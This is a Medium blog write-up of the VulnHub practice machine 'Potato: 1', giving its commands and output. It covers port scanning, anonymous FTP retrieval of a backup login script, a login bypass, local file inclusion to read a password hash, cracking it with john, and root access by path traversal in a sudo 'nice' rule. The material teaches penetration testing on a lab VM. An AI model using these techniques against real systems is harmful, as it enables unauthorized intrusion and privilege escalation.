VulnHub: Potato: 1

Today we will take a look at Vulnhub: Potato: 1. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.

  • Nmap
$ sudo nmap -p- -sCV --open 192.168.149.101PORT     STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 ef:24:0e:ab:d2:b3:16:b4:4b:2e:27:c0:5f:48:79:8b (RSA)
| 256 f2:d8:35:3f:49:59:85:85:07:e6:a2:0e:65:7a:8c:4b (ECDSA)
|_ 256 0b:23:89:c3:c0:26:d5:64:5e:93:b7:ba:f5:14:7f:3e (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Potato company
|_http-server-header: Apache/2.4.41 (Ubuntu)
2112/tcp open ftp ProFTPD
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 901 Aug 2 2020 index.php.bak
|_-rw-r--r-- 1 ftp ftp 54 Aug 2 2020 welcome.msg
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  • Gobuster
$ gobuster dir -u http://192.168.149.101 -w /usr/share/wordlist/dirbuster/directory-list-2.3-medium.txt===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.149.101
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/06/05 20:24:08 Starting gobuster in directory enumeration mode
===============================================================
/admin (Status: 301) [Size: 318]
/potato (Status: 301) [Size: 319]
  • Ftp
$ ftp 192.168.149.101 2112                                                                                                                                       
Connected to 192.168.149.101.
220 ProFTPD Server (Debian) [::ffff:192.168.149.101]
Name (192.168.149.101:al1z4deh): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230-Welcome, archive user anonymous@192.168.49.149 !
230-
230-The local time is: Sun Jun 05 16:52:39 2022
230-
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x 2 ftp ftp 4096 Aug 2 2020 .
drwxr-xr-x 2 ftp ftp 4096 Aug 2 2020 ..
-rw-r--r-- 1 ftp ftp 901 Aug 2 2020 index.php.bak
-rw-r--r-- 1 ftp ftp 54 Aug 2 2020 welcome.msg
226 Transfer complete
ftp> mget *
mget welcome.msg? y
200 PORT command successful
150 Opening BINARY mode data connection for welcome.msg (54 bytes)
226 Transfer complete
54 bytes received in 0.00 secs (155.5586 kB/s)
mget index.php.bak? y
200 PORT command successful
150 Opening BINARY mode data connection for index.php.bak (901 bytes)
226 Transfer complete
901 bytes received in 0.00 secs (1012.5234 kB/s)
ftp> bye
221 Goodbye.
  • Web

When we look at the website, we see a simple login page. We took its back codes from ftp. Now let’s analyze them.

$ cat index.php.bakif (strcmp($_POST['username'], "admin") == 0  && strcmp($_POST['password'], $pass) == 0) {

We see that we can bypass this line by searching.

And here we login.

  • LFI

Once logged in, dashboard.php has a logs section. After selecting a file, click the get the log button.

When we catch the request with burp, we see the file parameter. I used it as lfi.

We got the result. When we look at the results, we see the password of the webadmin user in hash format. Crack it.

$ nano hash$ john hash --wordlist=/usr/share/wordlists/rockyou.txt                                                                                                          Created directory: /home/al1z4deh/.john
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
dragon (webadmin)
1g 0:00:00:00 DONE (2022-06-05 20:58) 2.702g/s 518.9p/s 518.9c/s 518.9C/s 123456..november
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
  • Ssh

Let’s enter with ssh.

$ ssh webadmin@192.168.149.101
  • Root
$ sudo -l(ALL : ALL) /bin/nice /notes/*

In /notes folder we have two scripts which will run as root if we use sudo.

Let’s write a script that we will use.

webadmin@serv:~$ echo "/bin/bash" >> root.shwebadmin@serv:~$ sudo /bin/nice /notes/../home/webadmin/root.sh

And now we are the root

“If you have any questions or comments, please do not hesitate to write. Have a good days”

--

--

--

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Reading and Writing files using Python

Make android authentication easy for all

Agile Approach from the CTO’s Perspective: Pro and Contra

Code Reviews — A developer’s #1 priority

Web API best practices

hello human #backyardcritters #rainymorning

A type safe, JAVA Monad API. Part I : With Vavr’s Future and Try

Evolution of Windows Os

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Al1z4deh:~# echo "Welcome"

Al1z4deh:~# echo "Welcome"

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

More from Medium

TryHackMe: Madness

Celestial Writeup

Shibboleth — Hackthebox Writeup

DEVZAT — HackTheBox WriteUp